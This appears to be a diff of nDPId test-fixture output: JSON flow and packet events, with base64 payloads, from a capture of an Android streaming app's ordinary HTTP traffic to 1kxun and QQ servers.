OiBiOWUyODc3NjM1NGQyNTllDQpDbGllbnQtQ291bnRyeTogVVMNCkNsaWVudC1MYW5ndWFnZTogZW4NCkNsaWVudC1VaWQ6IGU2ZGJkMzBiLTNiODQtNDRiNC05NzUxLTYzMTE0OGEzZWRlOQ0KSG9zdDogbWVzc2FnZXMuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} -01196{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129449,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"flow_min_l4_payload_len":916,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":916,"midstream":1,"thread_ts_msec":1654385129449,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"messages.1kxun.mobi","url":"messages.1kxun.mobi\/api\/messages\/listForYingshi?client-uid=e6dbd30b-3b84-44b4-9751-631148a3ede9&min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
+01196{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129449,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"flow_min_l4_payload_len":916,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":916,"midstream":1,"thread_ts_msec":1654385129449,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"messages.1kxun.mobi","url":"messages.1kxun.mobi\/api\/messages\/listForYingshi?client-uid=e6dbd30b-3b84-44b4-9751-631148a3ede9&min_id=0&access_token=&_brand=Google&_model=sdk_gphone_x86&_ov=Android11&_cpu=i686&_resolution=1080%2C1794&_package=com.sceneway.kankan&_v=2.8.2.1&_channel=1kxun&_carrier=310260&_android_id=b9e28776354d259e&_network=wifi&_aid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&&_country=US&_locale=en&_=1654385125","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129508,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1654385129508,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1654385129508,"pkt":"tKXvZygQnLbQ0+MzCABFAADLA6ZAAEAGrXvAqAJ+dy1OuJeyAFCIwHUyTW4UsYAYAfaJyQAAAQEIChuIhYJcXfQQUE9TVCAvbXN0YXQvcmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtRW5jb2Rpbmc6IHJjNCxnemlwDQpDb250ZW50LUxlbmd0aDogMzcyDQpIb3N0OiBwaW5nbWEucXEuY29tOjgwDQoNCg=="} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129508,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1654385129508,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"pingma.qq.com","url":"pingma.qq.com:80\/mstat\/report","code":0,"content_type":"","user_agent":""}} 
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129508,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1654385129508,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"pingma.qq.com","url":"pingma.qq.com:80\/mstat\/report","code":0,"content_type":"","user_agent":""}} 00977{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1654385129508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":438,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":438,"pkt_l4_len":404,"thread_ts_msec":1654385129508,"pkt":"tKXvZygQnLbQ0+MzCABFAAGoA6dAAEAGrJ3AqAJ+dy1OuJeyAFCIwHXJTW4UsYAYAfaKpgAAAQEIChuIhYJcXfQQvRp0nw2ppXcC6yOw46wWgZzMy5FDJc4R5x6BDvjQ0wxoIXOGGYQ9NS8mc0GI8mV5B6RUdKOLLdyHMcd5TKKRXV6aUAhvfafdmP9+u1yyjoRBy\/Z4bsFO7z02iRFLaH+SssfPgku6BHrhNyeN5ALqOtKCwJWbgUqSjfxmV66Ayi6ArLH8ZRPEtkaOldzuHxhCZGsPLMj5lrpyCpBI\/hUytCRoVcL0dV\/QMO9SGuGNRi\/Ajkx3OZ7jw+iay1fvfajHKHxaFFiqQlP4ANAhjlwtkM1OWi\/Lk793\/2aCcJrjC4nFMTygSlSKmAIRkl+GU\/C069CZkcxT7jNFgtHFhmyXeOpqOHfhmo5N6mRINDfZIpwZkvTBUx608nxLnt\/BZ2XZomwSj9Suk4o\/lo2Z3vv3fPwkT6XztXus\/ExbD+p\/KI22uH8Uy5Ts4RpU6bqEMdXSPj2ssPfM+MX2Gy9aMgXGqKVNStu3vu3sFQ4t38e4RiEZp59c"} 
00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1654385129804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1654385129804,"pkt":"nLbQ0+MztKXvZygQCABFAAE9gOBAADQGUyKhdQ0dwKgCfgBQuKgo92zrWq4ZtIAYAPE2OQAAAQEICpcQ7Dm6xeoTSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNToyOSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWw7IGNoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC83LjEuMTcNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCg0KMWQNCh+LCAAAAAAAAAOzKcrPL7Gz0QdTANPi2TQNAAAADQowDQoNCg=="} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":1654385129813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1654385129813,"pkt":"nLbQ0+MztKXvZygQCABFAACc4O9AACsG5WB3LU64wKgCfgBQl7JNbhSxiMB3PYAYACHQkAAAAQEIClxd9FwbiIWCSFRUUC8xLjAgNDA0IE5vdCBGb3VuZA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDM0DQoNCnsicmV0IjotMSwgIm1zZyI6ImludmFsaWQgYXBwa2V5In0="} 
01619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1654385129990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":926,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":926,"pkt_l4_len":892,"thread_ts_msec":1654385129990,"pkt":"tKXvZygQnLbQ0+MzCABFAAOQVoNAAEAGbyzAqAJ+oXUNHbiOAFDYbwIrIGDngYAYAfV1OwAAAQEICrrF7C+XEOppR0VUIC92aWRlb19rYW5rYW5fdGFncy92Mi9hcGkvdmlkZW9zL2NoYW5uZWxzLmpzb24\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"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385131029,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"flow_min_l4_payload_len":202,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1654385131029,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1654385131029,"pkt":"tKXvZygQnLbQ0+MzCABFAAD+y9xAAEAGhTvAqAJ+rGl5Uur0AFBJWQVPCSiD6YAYAfbp0gAAAQEICvK1BpnJoboZR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL2ljb25zLzUtMzI4ZTNjZGYyNDRjMDAzZGYwODc1NGNjYTA1ZmJjMmYucG5nIEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KSG9zdDogcGljLjFreHVuLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBva2h0dHAvMy4xMC4wDQoNCg=="} 
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385131029,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"flow_min_l4_payload_len":202,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1654385131029,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/icons\/5-328e3cdf244c003df08754cca05fbc2f.png","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385131029,"flow_last_seen":1654385131029,"flow_idle_time":7580000,"flow_min_l4_payload_len":202,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1654385131029,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/icons\/5-328e3cdf244c003df08754cca05fbc2f.png","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1654385131335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1654385131335,"pkt":"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"} 08901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1654385131340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":6298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":6298,"pkt_l4_len":6264,"thread_ts_msec":1654385131340,"pkt":"nLbQ0+MztKXvZygQCABFABiMOP1AADYGCo2saXlSwKgCfgBQ6vQJKIUnSVkGGYAYAOsBYQAAAQEICsmhuxLytQaZiVBORw0KGgoAAAANSUhEUgAAADAAAAAsCAYAAAAjFjtnAAAACXBIWXMAAAsTAAALEwEAmpwYAAAKTWlDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVN3WJP3Fj7f92UPVkLY8LGXbIEAIiOsCMgQWaIQkgBhhBASQMWFiApWFBURnEhVxILVCkidiOKgKLhnQYqIWotVXDjuH9yntX167+3t+9f7vOec5\/zOec8PgBESJpHmomoAOVKFPDrYH49PSMTJvYACFUjgBCAQ5svCZwXFAADwA3l4fnSwP\/wBr28AAgBw1S4kEsfh\/4O6UCZXACCRAOAiEucLAZBSAMguVMgUAMgYALBTs2QKAJQAAGx5fEIiAKoNAOz0ST4FANipk9wXANiiHKkIAI0BAJkoRyQCQLsAYFWBUiwCwMIAoKxAIi4EwK4BgFm2MkcCgL0FAHaOWJAPQGAAgJlCLMwAIDgCAEMeE80DIEwDoDDSv+CpX3CFuEgBAMDLlc2XS9IzFLiV0Bp38vDg4iHiwmyxQmEXKRBmCeQinJebIxNI5wNMzgwAABr50cH+OD+Q5+bk4eZm52zv9MWi\/mvwbyI+IfHf\/ryMAgQAEE7P79pf5eXWA3DHAbB1v2upWwDaVgBo3\/ldM9sJoFoK0Hr5i3k4\/EAenqFQyDwdHAoLC+0lYqG9MOOLPv8z4W\/gi372\/EAe\/tt68ABxmkCZrcCjg\/1xYW52rlKO58sEQjFu9+cj\/seFf\/2OKdHiNLFcLBWK8ViJuFAiTcd5uVKRRCHJleIS6X8y8R+W\/QmTdw0ArIZPwE62B7XLbMB+7gECiw5Y0nYAQH7zLYwaC5EAEGc0Mnn3AACTv\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\/lBKWfMkKZoKpRzame1AiqiDqfWkltoHZQL1OHqRM0dZolzZsWQ8ukLaPV0JppZ2n3aC\/pdLoJ3YMeRZfQl9Jr6Afp5+mD9HcMDYYNg8dIYigZaxl7GacYtxkvmUymBdOXmchUMNcyG5lnmA+Yb1VYKvYq
fBWRyhKVOpVWlX6V56pUVXNVP9V5qgtUq1UPq15WfaZGVbNQ46kJ1Bar1akdVbupNq7OUndSj1DPUV+jvl\/9gvpjDbKGhUaghkijVGO3xhmNIRbGMmXxWELWclYD6yxrmE1iW7L57Ex2Bfsbdi97TFNDc6pmrGaRZp3mcc0BDsax4PA52ZxKziHODc57LQMtPy2x1mqtZq1+rTfaetq+2mLtcu0W7eva73VwnUCdLJ31Om0693UJuja6UbqFutt1z+o+02PreekJ9cr1Dund0Uf1bfSj9Rfq79bv0R83MDQINpAZbDE4Y\/DMkGPoa5hpuNHwhOGoEctoupHEaKPRSaMnuCbuh2fjNXgXPmasbxxirDTeZdxrPGFiaTLbpMSkxeS+Kc2Ua5pmutG003TMzMgs3KzYrMnsjjnVnGueYb7ZvNv8jYWlRZzFSos2i8eW2pZ8ywWWTZb3rJhWPlZ5VvVW16xJ1lzrLOtt1ldsUBtXmwybOpvLtqitm63Edptt3xTiFI8p0in1U27aMez87ArsmuwG7Tn2YfYl9m32zx3MHBId1jt0O3xydHXMdmxwvOuk4TTDqcSpw+lXZxtnoXOd8zUXpkuQyxKXdpcXU22niqdun3rLleUa7rrStdP1o5u7m9yt2W3U3cw9xX2r+00umxvJXcM970H08PdY4nHM452nm6fC85DnL152Xlle+70eT7OcJp7WMG3I28Rb4L3Le2A6Pj1l+s7pAz7GPgKfep+Hvqa+It89viN+1n6Zfgf8nvs7+sv9j\/i\/4XnyFvFOBWABwQHlAb2BGoGzA2sDHwSZBKUHNQWNBbsGLww+FUIMCQ1ZH3KTb8AX8hv5YzPcZyya0RXKCJ0VWhv6MMwmTB7WEY6GzwjfEH5vpvlM6cy2CIjgR2yIuB9pGZkX+X0UKSoyqi7qUbRTdHF09yzWrORZ+2e9jvGPqYy5O9tqtnJ2Z6xqbFJsY+ybuIC4qriBeIf4RfGXEnQTJAntieTE2MQ9ieNzAudsmjOc5JpUlnRjruXcorkX5unOy553PFk1WZB8OIWYEpeyP+WDIEJQLxhP5aduTR0T8oSbhU9FvqKNolGxt7hKPJLmnVaV9jjdO31D+miGT0Z1xjMJT1IreZEZkrkj801WRNberM\/ZcdktOZSclJyjUg1plrQr1zC3KLdPZisrkw3keeZtyhuTh8r35CP5c\/PbFWyFTNGjtFKuUA4WTC+oK3hbGFt4uEi9SFrUM99m\/ur5IwuCFny9kLBQuLCz2Lh4WfHgIr9FuxYji1MXdy4xXVK6ZHhp8NJ9y2jLspb9UOJYUlXyannc8o5Sg9KlpUMrglc0lamUycturvRauWMVYZVkVe9ql9VbVn8qF5VfrHCsqK74sEa45uJXTl\/VfPV5bdra3kq3yu3rSOuk626s91m\/r0q9akHV0IbwDa0b8Y3lG19tSt50oXpq9Y7NtM3KzQM1YTXtW8y2rNvyoTaj9nqdf13LVv2tq7e+2Sba1r\/dd3vzDoMdFTve75TsvLUreFdrvUV99W7S7oLdjxpiG7q\/5n7duEd3T8Wej3ulewf2Re\/ranRvbNyvv7+yCW1SNo0eSDpw5ZuAb9qb7Zp3tXBaKg7CQeXBJ9+mfHvjUOihzsPcw83fmX+39QjrSHkr0jq\/dawto22gPaG97+iMo50dXh1Hvrf\/fu8x42N1xzWPV56gnSg98fnkgpPjp2Snnp1OPz3Umdx590z8mWtdUV29Z0PPnj8XdO5Mt1\/3yfPe549d8Lxw9CL3Ytslt0utPa49R35w\/eFIr1tv62X3y+1XPK509E3rO9Hv03\/6asDVc9f41y5dn3m978bsG7duJt0cuCW69fh29u0XdwruTNxdeo94r\/y+2v3qB\/oP6n+0\/rFlwG3g+GDAYM\/DWQ\/vDgmHnv6U\/9OH4dJHzEfVI0YjjY+dHx8bDRq98mTOk+GnsqcTz8p+Vv9563Or59\/9
4vtLz1j82PAL+YvPv655qfNy76uprzrHI8cfvM55PfGm\/K3O233vuO+638e9H5ko\/ED+UPPR+mPHp9BP9z7nfP78L\/eE8\/sl0p8zAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAA2FSURBVHja7FprzGXlVX7Wet99O7fvfps7M8wwlwBTBpRSW6AFLGJqULS1P7SNaPnR2B81aVAiNTZKlEZJq1RiUjWVtKAI0Yy2dUBKKQMMQxkGyqXDzMcw3\/1+Lvvsvd93LX+c7\/vmwoCgaEPkTc7Jzs7Ze6\/nXWs961lrH1JVvJsX412+3vUAbOuxzwEACIK0qKBZdIHUG2ZHxCyptKWY\/ic0sQaZ6UZZxxFRHWlpI8arH8OWcg6a\/jGKNqG31oNRHkRN59GQABvcLMQthyh1vomgPkyAQJEHMUZpHWL3LPpP3AcjGZo8iAIVRFhCLb4UQVhBV7UgBXYCGAXQONMDZvkDVVp+GFkVFjUq81EXZOX821zKDCYCswIgEJRV3k54CKBC4hVQKAA9WwjFAGJVQmRTGPJQNZlqKsopWlyDwERCgfUIWchaJRMIBabhLdSWAI5ApCAwoAQoQKpYSroxlU9gznZBySGF8fMeIBgoJ1BO0JIQjmJSNpESxwIbCKwVcDBVG+FWMKwLWZcCeN6wNA08Tv1YgjYBgBjwzgNoQ9UB1IZL3XBfe++tFZncWfJL3nPsQtQjqHeJ1qVqilZlws+m9faBuvnAw62iecTHfW0SAhGQw6LhmkgYaNafwtzADQiaU9Bs6uogfe4KA+46L6gOUzZWLuev9bI6G6HezqnSJOScNb632KT3\/x2S2gNNcVAFmq4EMuZkDuQSgqDIKcZS2yKOFQttYH5iDlUa\/9Rm+u5NCmCuqM4x2SJX4Z5gcWCukS9h8eFWk\/KgO8w+XZEDraxZ\/qHt+dW782TTX4MkIyiYGASCIIRtjV\/Z1fznm5P24avC2NFiCxAXT2amxy3xsFchJaMyIMfPqcYZpDGOpvvRRa3q578\/i+FZuBwzWRcoSlajyTZ8FaSKOveAtA7RAn2D3egOl2COPf0zBRGy+NKvz\/RecuuxsR\/na6tDQVfcvuiR+YHD7EfrXWGpx9vej27XB39tAMcu2TzzZ5cthruvr\/de98caDe1TslCVrWX\/0hd6pvfdUCoVXUex6Znniqvv7qmELy7MH3nskcnN3oXrBWEMT+xvKt+xo6lDu8vuhTsMWoPTsran2nhktmwBYy4GkQeW65clqCVSYYiAGaKWLWk\/9W6rhseLixaapdaJ5Prb1pVnjx+nDBWjoGTHa8HSPLhIwdQ1vcDbXjo2vPvug9Nj5+1auvf3t4Q\/vKY2+dzu6fwXv2yInhycuesvExnd2kYsx3HVV5vrdnzl+Rf6X7pobYiQXkRPaDHfXgB8BM3qmOq79vHJ+LITFy7+9u3eeEr8aPeaxbuw0Ptpqxw50uJkCJHAkwcQWECaW9qTj9\/cf2L\/DaJkWVtlUGnBD3+QK1vOx87BCWD0b6HSXHYhAVAkNoPlYKYWxzOLa2\/6rSfr37vxp4N7bhmY\/dYf9VFUhDYLnI\/T0ZHP\/2Yt6P17YBJJWIAV8KcwSi4e29cMwXZvAaEoUdMUkc51r5n40r0qbqJYOHQ46N3+jSJa8zCkA8LCacCGJXXkbP3ZW0bcvk810sq8M0m7xzbKZBhNAjWcB8dDKA9cDEw8uErsp67CC0bi+qjv3vPlp9td6XnZ178YmSyYtud\/hweuvW3I9jwkurjMiGdcK4Jzhsu4dOsIhFKoqmIWQlAKqb5JGZtGaP+lczOzW2TTb1xjiBxIYYmC3EuKMH2ASu75tWmb60+4T1zLA+8b24J77uxfOHDV0aMP6rGj+1CIx7a+AJfYBJZTnE7phEJCxMiRxLLgei\/504X80Suq6ZErlzbe8Ht96DrQ1Z7GkjW
gM\/RXVhTYvHYQl+9aAyeyWneYnc3yUjYfXHt7QlMSp098roaXr8h1ao1y9VVAYEU9Gtk85lolDXwlK6hWzAfB0WqRTZ2g8x7r1yc\/2k4ZIAXD4OlRgR\/sQ+FnECwHgKiBZaCbjqLRylEEAiuvFm3HL9RM8uHR6f7GoskwEpXQ8gRnZJVFXJFj+4Yh7Dx3I0Rcx\/CO\/QqFNYampXbBLceDAV47NfaJyB2pKRmn1FFBdmLpeRQ+AyiEgkBEWiibg1OMS2suJKwkPEEARJbx3HQB5h6sj9dBoYhNiu75x9Ga+xHmiAAmiDB6uRESAYa8WXAWs3kVACEJy1hXVTDq6B3ZgfVrz4GqXzX+VP+QKozOYqYYqq5jsxK3SrRSB1wKIgbRqcEAGPWnnTtNQBmCKjCZb8NQ8CiS5otIXQqy0cnMsKZTlZeXYcBQRw04B1QDAnEVyfBlEDmrSjgtPC2d\/TeW6L8rSBWGCJGfBuAADt7ylSsbU3iGigcR\/eTktMKclZHeDpD3Gpr3ALwH4P8BgDfqCt8igJXSiFP6OlqWc\/K\/bz0RZNnUM1n\/f+QBp4BHCDpNU76NXYWB1\/AnE0IERssBz9C18FTGirx968YzQj+BcvsQMkn+bwGQhqiFLXheQBquBQZ+HsbEnV76LcWzwpgSLGXoG\/0ahtKHkPrqOwtATQhRBkQRGaLYMBLDIDDWV8YxHDwLUUDyFDYaQH\/f5bBUAv6LnBAAPVbRE0bwCEBMGBm\/C8PpPqS+8oY5wNTJvDPHMm8IgH3emcswgUGwIGSecW5pFEP5o1CiVWklvkAc9qO7a+eqJD7rphAQkGJNsNzTEqBkoaIYPnFnB4SUV6iCTrKHwvLKwOYtAFBVFAooOpfkzms9t9iSHMHG7NsAEfSMS71kqESbEJjaG4ZS5gj97GFVTxWqq7s6fOJrGG49hNTXAHTkp2rnwOvZrWWoLgv+k+CsNah296EzEANqScnvqr6I89wDADNUz+44NgFqg3ugeQGXLpzmbxVFOSJYG6xOFE7ftGUQ43+F4XQfGq4snfakg9ULkQpeJ56tkl3meAuA4b1H\/+AQNm64AAsHvwMnim2Di9XhpUeQqyFPgXqycAiRFxGici88p1CNAclRTobR85HfRcoxsie+BG3NdUaWBKyrFJAiAXkHT2U4xFCQBVBaAUEiGBm7E26Eu4VCMpSB2cIub8aZOWCXogs6IWAS1HS6TcUr2LTzeoRFG1wsNroqqdk6d9s9mQ9ejuHCEppFovV2t5\/LegYaTcZrWV8jq0faHptJPnRXoGlroLoW3L8H7tBXVJcyDhqv2lpkUInWYL4xgXbW\/NiAPXxlNZ+ohEi3A7iQGeHK7hIUGye\/yuIRkDEmT2eQZlvY556Jl4sZd4LGVmh0mR0iRLQQeAa5dJLft+tDqB\/78L3j8xNXd5dntpPoT4mwBCSUiJLRcUrcoR5mgFznfqOF31Dp2fWvY4f3f7c6+DKQzjnYWIrahqLWXaDddsNd7b1\/2NV89pNJ0i4RAE+ANxYNHhlTDqBgXekVotjX8+49ty\/yuZiZdWwiQygA2CBEGAHiYUPML3NzACNN47jq9h\/4QbHgS0i0ODbd9Ss\/9wSVq2mWJ5kjjRjIC0Ev1+n99M11g13nrnulXd15aA7BMA5ft37p33\/9B\/1\/8MnL0r2H+9xLH2hzJV+U3kUrh6+onvjGHVbGL4hCWWhj6OFm7cr748n7W3UamH6m8plDM1kZuUQKJbBh7BqUelhMN4\/NAWyTtndWAEAz7yAOUA+bobsDgCIoR9KiWuvhxeHpvf9wD0gCJBq4VrIwH7hwnqgznVAhSJrjWP8vjG1zpSfGfN99B\/MevLb0kW\/9ef+t+66pf2GvL1zBjMgKNS+k+75YOfH9PUPJ5AX3N3\/5trG5nps34Cjm6zvw6qhBphZT7gXkMFAmECtKRnHgGY9mJrh452aze1P7g6V0tluVP
